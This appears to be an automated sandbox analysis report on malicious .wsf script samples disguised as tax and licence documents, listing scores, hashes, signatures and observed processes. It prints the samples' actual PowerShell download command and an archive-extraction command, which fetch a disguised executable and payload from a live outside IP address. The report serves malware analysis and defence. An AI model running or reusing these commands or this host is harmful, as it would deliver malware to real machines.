Overview

Static (score 10)
Target | Platform | Score
2O22-Tax-Returns.wsf | windows7-x64 | 1
2O22-Tax-Returns.wsf | windows10-2004-x64 | 10
DRlVERS-LlCENSE.wsf | windows7-x64 | 10
DRlVERS-LlCENSE.wsf | windows10-2004-x64 | 10
PR0FlT&L0SS_2O23.wsf | windows7-x64 | 10
PR0FlT&L0SS_2O23.wsf | windows10-2004-x64 | 10
ScheduIe-K.wsf | windows7-x64 | 10
ScheduIe-K.wsf | windows10-2004-x64 | 10
Analysis (score 10)
- max time kernel: 0s
- max time network: 118s
- platform: windows7_x64
- resource: win7-20231129-en
- resource tags: arch:x64, arch:x86, image:win7-20231129-en, locale:en-us, os:windows7-x64, system
- submitted: 24-01-2024 04:21
Static task: static1
Behavioral task behavioral1: sample 2O22-Tax-Returns.wsf, resource win7-20231215-en
Behavioral task behavioral2: sample 2O22-Tax-Returns.wsf, resource win10v2004-20231215-en
Behavioral task behavioral3: sample DRlVERS-LlCENSE.wsf, resource win7-20231215-en
Behavioral task behavioral4: sample DRlVERS-LlCENSE.wsf, resource win10v2004-20231215-en
Behavioral task behavioral5: sample PR0FlT&L0SS_2O23.wsf, resource win7-20231215-en
Behavioral task behavioral6: sample PR0FlT&L0SS_2O23.wsf, resource win10v2004-20231215-en
Behavioral task behavioral7: sample ScheduIe-K.wsf, resource win7-20231129-en
General
- Target: ScheduIe-K.wsf
- Size: 4KB
- MD5: eafa5d2bdb1f8bca65b208d7e6101e1c
- SHA1: da7085b340e3b02d94bb4acc92ee9475133b7948
- SHA256: 572a90ba88b5424d527785d48667dfd95293469b07ab016970b7253e2bb5d0d0
- SHA512: 2114d0dda32e2224c8253a9ec038b6f212a01082bb73222780391e0842a73097c57454f248135671f67662f419bba9c5cbb7721a1eba6790eb59381e7a4bbda8
- SSDEEP: 96:021JYd1k2ig3AwYx4wg3CWPqrHekw21JYd1k2ig3AwYx4wg3CWPqrHek4:Np2ioAwYgSWPqTeGp2ioAwYgSWPqTeB
Malware Config
Extracted:
- http://176.107.185.29:666/Rar.jpg
- http://176.107.185.29:666/load.rar
Signatures
- Blocklisted process makes network request (1 IoC)
  Processes: WScript.exe (PID 2316), flow 3
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Suspicious use of WriteProcessMemory (3 IoCs)
  Processes: PID 2316 (WScript.exe) wrote to memory of PID 2132 (powershell.exe); the same entry is recorded three times.
Processes
- C:\Windows\System32\WScript.exe
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ScheduIe-K.wsf"
  - Blocklisted process makes network request
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Start-BitsTransfer -Source 'http://176.107.185.29:666/Rar.jpg' -Destination 'C:\Users\Public\Rar.exe'; Start-BitsTransfer -Source 'http://176.107.185.29:666/load.rar' -Destination 'C:\Users\Public\load.rar'"
  - C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c Rar.exe x -p111 load.rar
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
- memory/2132-8-0x00000000021D0000-0x00000000021D8000-memory.dmp (32KB)
- memory/2132-7-0x000000001B610000-0x000000001B8F2000-memory.dmp (2.9MB)
- memory/2132-9-0x000007FEF5B90000-0x000007FEF652D000-memory.dmp (9.6MB)
- memory/2132-12-0x0000000002D00000-0x0000000002D80000-memory.dmp (512KB)
- memory/2132-13-0x0000000002D00000-0x0000000002D80000-memory.dmp (512KB)
- memory/2132-11-0x000007FEF5B90000-0x000007FEF652D000-memory.dmp (9.6MB)
- memory/2132-10-0x0000000002D00000-0x0000000002D80000-memory.dmp (512KB)
- memory/2132-14-0x000007FEF5B90000-0x000007FEF652D000-memory.dmp (9.6MB)